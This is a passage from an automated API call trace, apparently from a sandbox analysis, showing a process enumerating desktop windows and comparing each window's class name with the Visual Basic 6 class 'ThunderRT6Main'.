lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9fc [0089.509] GetWindow (hWnd=0x101ca, uCmd=0x2) returned 0x201c6 [0089.509] GetClassNameA (in: hWnd=0x201c6, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="_WwO") returned 4 [0089.509] lstrcmpA (lpString1="_WwO", lpString2="ThunderRT6Main") returned -1 [0089.509] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9c8 [0089.509] GetWindowLongA (hWnd=0x201c6, nIndex=-16) returned -2080374784 [0089.509] GetWindowLongA (hWnd=0x201c6, nIndex=-6) returned 1785659392 [0089.509] GetWindowLongA (hWnd=0x201c6, nIndex=-6) returned 1785659392 [0089.509] GetWindow (hWnd=0x201c6, uCmd=0x2) returned 0x101ba [0089.509] GetClassNameA (in: hWnd=0x101ba, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="GDI+ Hook Window Class") returned 22 [0089.509] lstrcmpA (lpString1="GDI+ Hook Window Class", lpString2="ThunderRT6Main") returned -1 [0089.509] GetWindowThreadProcessId (in: hWnd=0x101ba, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9c8 [0089.509] GetWindowLongA (hWnd=0x101ba, nIndex=-16) returned -2080374784 [0089.509] GetWindowLongA (hWnd=0x101ba, nIndex=-6) returned 1938030592 [0089.509] GetWindowLongA (hWnd=0x101ba, nIndex=-6) returned 1938030592 [0089.509] GetWindow (hWnd=0x101ba, uCmd=0x2) returned 0x6019c [0089.509] GetClassNameA (in: hWnd=0x6019c, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="ARC Window Class") returned 16 [0089.509] lstrcmpA (lpString1="ARC Window Class", lpString2="ThunderRT6Main") returned -1 [0089.509] GetWindowThreadProcessId (in: hWnd=0x6019c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9c8 [0089.509] GetWindowLongA (hWnd=0x6019c, nIndex=-16) returned -2080374784 [0089.509] GetWindowLongA (hWnd=0x6019c, nIndex=-6) returned 12648448 [0089.509] GetWindowLongA (hWnd=0x6019c, nIndex=-6) returned 12648448 [0089.509] GetWindow (hWnd=0x6019c, uCmd=0x2) returned 0x1019a [0089.509] GetClassNameA (in: hWnd=0x1019a, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.509] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.509] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8fc [0089.509] GetWindow (hWnd=0x1019a, uCmd=0x2) returned 0x10198 [0089.509] GetClassNameA (in: hWnd=0x10198, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="Nervebraceletcls") returned 16 [0089.509] lstrcmpA (lpString1="Nervebraceletcls", lpString2="ThunderRT6Main") returned -1 [0089.509] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8fc [0089.509] GetWindow (hWnd=0x10198, uCmd=0x2) returned 0x10196 [0089.509] GetClassNameA (in: hWnd=0x10196, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.509] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.509] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8ec [0089.509] GetWindow (hWnd=0x10196, uCmd=0x2) returned 0x10194 [0089.509] GetClassNameA (in: hWnd=0x10194, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="Lease_Entitled_pcs_class") returned 24 [0089.510] lstrcmpA (lpString1="Lease_Entitled_pcs_class", lpString2="ThunderRT6Main") returned -1 [0089.510] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8ec [0089.510] GetWindow (hWnd=0x10194, uCmd=0x2) returned 0x10192 [0089.510] GetClassNameA (in: hWnd=0x10192, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.510] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.510] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8dc [0089.510] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0089.510] GetClassNameA (in: hWnd=0x10190, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="Lighter") returned 7 [0089.510] lstrcmpA (lpString1="Lighter", lpString2="ThunderRT6Main") returned -1 [0089.510] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8dc [0089.510] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0089.510] GetClassNameA (in: hWnd=0x1018e, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.510] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.510] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8cc [0089.510] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0089.510] GetClassNameA (in: hWnd=0x1018c, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="Distributors_window") returned 19 [0089.510] lstrcmpA (lpString1="Distributors_window", lpString2="ThunderRT6Main") returned -1 [0089.510] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8cc [0089.510] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x10188 [0089.510] GetClassNameA (in: hWnd=0x10188, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="advocate_keep_window") returned 20 [0089.510] lstrcmpA (lpString1="advocate_keep_window", lpString2="ThunderRT6Main") returned -1 [0089.510] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8b8 [0089.510] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x1018a [0089.510] GetClassNameA (in: hWnd=0x1018a, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.510] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.510] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8b8 [0089.510] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10184 [0089.510] GetClassNameA (in: hWnd=0x10184, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="irish_window") returned 12 [0089.510] lstrcmpA (lpString1="irish_window", lpString2="ThunderRT6Main") returned -1 [0089.510] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8a8 [0089.510] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0089.510] GetClassNameA (in: hWnd=0x10186, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.510] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.510] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8a8 [0089.510] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0089.510] GetClassNameA (in: hWnd=0x10180, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="fifthrollercls") returned 14 [0089.510] lstrcmpA (lpString1="fifthrollercls", lpString2="ThunderRT6Main") returned -1 [0089.510] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x898 [0089.510] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0089.510] GetClassNameA (in: hWnd=0x10182, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.510] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.511] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x898 [0089.511] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0089.511] GetClassNameA (in: hWnd=0x1017c, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="evanescenceOscarEmclass") returned 23 [0089.511] lstrcmpA (lpString1="evanescenceOscarEmclass", lpString2="ThunderRT6Main") returned -1 [0089.511] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x888 [0089.511] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0089.511] GetClassNameA (in: hWnd=0x1017e, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.511] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.511] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x888 [0089.511] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0089.511] GetClassNameA (in: hWnd=0x10178, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="remainedUniverseSoleapp") returned 23 [0089.511] lstrcmpA (lpString1="remainedUniverseSoleapp", lpString2="ThunderRT6Main") returned -1 [0089.511] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x878 [0089.511] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0089.511] GetClassNameA (in: hWnd=0x1017a, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.511] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.511] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x878 [0089.511] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0089.511] GetClassNameA (in: hWnd=0x10174, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="PanelMariaSuggestionclass") returned 25 [0089.511] lstrcmpA (lpString1="PanelMariaSuggestionclass", lpString2="ThunderRT6Main") returned -1 [0089.511] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x868 [0089.511] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0089.511] GetClassNameA (in: hWnd=0x10176, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.511] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.511] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x868 [0089.511] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0089.511] GetClassNameA (in: hWnd=0x10170, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="invalid_cls") returned 11 [0089.511] lstrcmpA (lpString1="invalid_cls", lpString2="ThunderRT6Main") returned -1 [0089.511] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x858 [0089.511] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0089.511] GetClassNameA (in: hWnd=0x10172, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.511] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.511] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x858 [0089.511] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0089.511] GetClassNameA (in: hWnd=0x1016c, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="myersbiggestQatarwnd") returned 20 [0089.511] lstrcmpA (lpString1="myersbiggestQatarwnd", lpString2="ThunderRT6Main") returned -1 [0089.511] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x848 [0089.511] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0089.511] GetClassNameA (in: hWnd=0x1016e, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.511] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.511] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x848 [0089.511] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0089.512] GetClassNameA (in: hWnd=0x10168, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="Info_began_Nobody_Tops_class") returned 28 [0089.512] lstrcmpA (lpString1="Info_began_Nobody_Tops_class", lpString2="ThunderRT6Main") returned -1 [0089.512] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x838 [0089.512] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0089.512] GetClassNameA (in: hWnd=0x1016a, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.512] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.512] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x838 [0089.512] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0089.512] GetClassNameA (in: hWnd=0x10164, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="charge_trackbacks_observe_cls") returned 29 [0089.512] lstrcmpA (lpString1="charge_trackbacks_observe_cls", lpString2="ThunderRT6Main") returned -1 [0089.512] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x828 [0089.512] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0089.512] GetClassNameA (in: hWnd=0x10166, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.512] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.512] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x828 [0089.512] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0089.512] GetClassNameA (in: hWnd=0x10160, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="Designed_wnd") returned 12 [0089.512] lstrcmpA (lpString1="Designed_wnd", lpString2="ThunderRT6Main") returned -1 [0089.512] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x818 [0089.512] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0089.512] GetClassNameA (in: hWnd=0x10162, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.512] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.512] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x818 [0089.512] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0089.512] GetClassNameA (in: hWnd=0x1015c, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="FoodLogosLotapp") returned 15 [0089.512] lstrcmpA (lpString1="FoodLogosLotapp", lpString2="ThunderRT6Main") returned -1 [0089.512] GetWindowThreadProcessId (in: hWnd=0x1015c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x808 [0089.512] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0089.512] GetClassNameA (in: hWnd=0x1015e, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.512] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.512] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x808 [0089.512] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x10158 [0089.512] GetClassNameA (in: hWnd=0x10158, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="Enterprisemonsterscommentswin") returned 29 [0089.512] lstrcmpA (lpString1="Enterprisemonsterscommentswin", lpString2="ThunderRT6Main") returned -1 [0089.512] GetWindowThreadProcessId (in: hWnd=0x10158, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x128 [0089.512] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x1015a [0089.512] GetClassNameA (in: hWnd=0x1015a, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.512] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.512] GetWindowThreadProcessId (in: hWnd=0x1015a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x128 [0089.512] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x20154 [0089.512] GetClassNameA (in: hWnd=0x20154, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="involved_int_antenna_lol_wnd") returned 28 [0089.513] lstrcmpA (lpString1="involved_int_antenna_lol_wnd", lpString2="ThunderRT6Main") returned -1 [0089.513] GetWindowThreadProcessId (in: hWnd=0x20154, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x52c [0089.513] GetWindow (hWnd=0x20154, uCmd=0x2) returned 0x7013a [0089.513] GetClassNameA (in: hWnd=0x7013a, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.513] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.513] GetWindowThreadProcessId (in: hWnd=0x7013a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x52c [0089.513] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x10152 [0089.513] GetClassNameA (in: hWnd=0x10152, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="LyricsmorningEffectivenessclass") returned 31 [0089.513] lstrcmpA (lpString1="LyricsmorningEffectivenessclass", lpString2="ThunderRT6Main") returned -1 [0089.513] GetWindowThreadProcessId (in: hWnd=0x10152, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x510 [0089.513] GetWindow (hWnd=0x10152, uCmd=0x2) returned 0x10156 [0089.513] GetClassNameA (in: hWnd=0x10156, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.513] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.513] GetWindowThreadProcessId (in: hWnd=0x10156, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x510 [0089.513] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x1014c [0089.513] GetClassNameA (in: hWnd=0x1014c, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="Bookings_cls") returned 12 [0089.513] lstrcmpA (lpString1="Bookings_cls", lpString2="ThunderRT6Main") returned -1 [0089.513] GetWindowThreadProcessId (in: hWnd=0x1014c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x420 [0089.513] GetWindow (hWnd=0x1014c, uCmd=0x2) returned 0x10150 [0089.513] GetClassNameA (in: hWnd=0x10150, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.513] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.513] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x420 [0089.513] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10146 [0089.513] GetClassNameA (in: hWnd=0x10146, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="output_cls") returned 10 [0089.513] lstrcmpA (lpString1="output_cls", lpString2="ThunderRT6Main") returned -1 [0089.513] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x424 [0089.513] GetWindow (hWnd=0x10146, uCmd=0x2) returned 0x1014a [0089.513] GetClassNameA (in: hWnd=0x1014a, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.513] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.513] GetWindowThreadProcessId (in: hWnd=0x1014a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x424 [0089.513] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x3013c [0089.513] GetClassNameA (in: hWnd=0x3013c, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="Argentina_Conducting_Merchandise_win") returned 36 [0089.513] lstrcmpA (lpString1="Argentina_Conducting_Merchandise_win", lpString2="ThunderRT6Main") returned -1 [0089.513] GetWindowThreadProcessId (in: hWnd=0x3013c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x740 [0089.513] GetWindow (hWnd=0x3013c, uCmd=0x2) returned 0x10144 [0089.513] GetClassNameA (in: hWnd=0x10144, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.513] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.513] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x740 [0089.513] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x30136 [0089.513] GetClassNameA (in: hWnd=0x30136, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="blowIranLaboratoryDisastercls") returned 29 [0089.513] lstrcmpA (lpString1="blowIranLaboratoryDisastercls", lpString2="ThunderRT6Main") returned -1 [0089.513] GetWindowThreadProcessId (in: hWnd=0x30136, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x150 [0089.514] GetWindow (hWnd=0x30136, uCmd=0x2) returned 0x20138 [0089.514] GetClassNameA (in: hWnd=0x20138, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.514] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.514] GetWindowThreadProcessId (in: hWnd=0x20138, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x150 [0089.514] GetWindow (hWnd=0x20138, uCmd=0x2) returned 0x10132 [0089.514] GetClassNameA (in: hWnd=0x10132, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="FaxMonWinClass{3FD224BA-8556-47fb-B260-3E451BAE2793}") returned 52 [0089.514] lstrcmpA (lpString1="FaxMonWinClass{3FD224BA-8556-47fb-B260-3E451BAE2793}", lpString2="ThunderRT6Main") returned -1 [0089.514] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x54c [0089.514] GetWindow (hWnd=0x10132, uCmd=0x2) returned 0x10122 [0089.514] GetClassNameA (in: hWnd=0x10122, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0089.514] lstrcmpA (lpString1="BluetoothNotificationAreaIconWindowClass", lpString2="ThunderRT6Main") returned -1 [0089.514] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x630 [0089.514] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0089.514] GetClassNameA (in: hWnd=0x10120, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0089.514] lstrcmpA (lpString1="MS_WebcheckMonitor", lpString2="ThunderRT6Main") returned -1 [0089.514] GetWindowThreadProcessId (in: hWnd=0x10120, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x5e0 [0089.514] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0089.514] GetClassNameA (in: hWnd=0x20116, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="PNIHiddenWnd") returned 12 [0089.514] lstrcmpA (lpString1="PNIHiddenWnd", lpString2="ThunderRT6Main") returned -1 [0089.514] GetWindowThreadProcessId (in: hWnd=0x20116, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x630 [0089.514] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0089.514] GetClassNameA (in: hWnd=0x1010a, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="Media Center SSO") returned 16 [0089.514] lstrcmpA (lpString1="Media Center SSO", lpString2="ThunderRT6Main") returned -1 [0089.514] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x5e0 [0089.514] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0089.514] GetClassNameA (in: hWnd=0x1010c, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.514] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.514] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x5e0 [0089.514] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0089.514] GetClassNameA (in: hWnd=0x2001e, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="ATL:73723188") returned 12 [0089.514] lstrcmpA (lpString1="ATL:73723188", lpString2="ThunderRT6Main") returned -1 [0089.514] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x630 [0089.514] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0089.514] GetClassNameA (in: hWnd=0x20020, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.514] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.514] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x630 [0089.514] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0089.514] GetClassNameA (in: hWnd=0x2001c, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="SystemTray_Main") returned 15 [0089.514] lstrcmpA (lpString1="SystemTray_Main", lpString2="ThunderRT6Main") returned -1 [0089.514] GetWindowThreadProcessId (in: hWnd=0x2001c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x54c [0089.514] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0089.514] GetClassNameA (in: hWnd=0x20016, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.515] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.515] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x54c [0089.515] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0089.515] GetClassNameA (in: hWnd=0x200ae, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0089.515] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0089.515] GetWindowThreadProcessId (in: hWnd=0x200ae, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x54c [0089.515] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0089.515] GetClassNameA (in: hWnd=0x2009e, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0089.515] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0089.515] GetWindowThreadProcessId (in: hWnd=0x2009e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.515] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0089.515] GetClassNameA (in: hWnd=0x2008c, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="AUTHUI.DLL: Shutdown Choices Message Window") returned 43 [0089.515] lstrcmpA (lpString1="AUTHUI.DLL: Shutdown Choices Message Window", lpString2="ThunderRT6Main") returned -1 [0089.515] GetWindowThreadProcessId (in: hWnd=0x2008c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.515] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0089.515] GetClassNameA (in: hWnd=0x2008e, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="_SearchEditBoxFakeWindow") returned 24 [0089.515] lstrcmpA (lpString1="_SearchEditBoxFakeWindow", lpString2="ThunderRT6Main") returned -1 [0089.515] GetWindowThreadProcessId (in: hWnd=0x2008e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.515] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0089.515] GetClassNameA (in: hWnd=0x20092, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0089.515] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0089.515] GetWindowThreadProcessId (in: hWnd=0x20092, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.515] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0089.515] GetClassNameA (in: hWnd=0x2009a, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0089.515] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0089.515] GetWindowThreadProcessId (in: hWnd=0x2009a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) 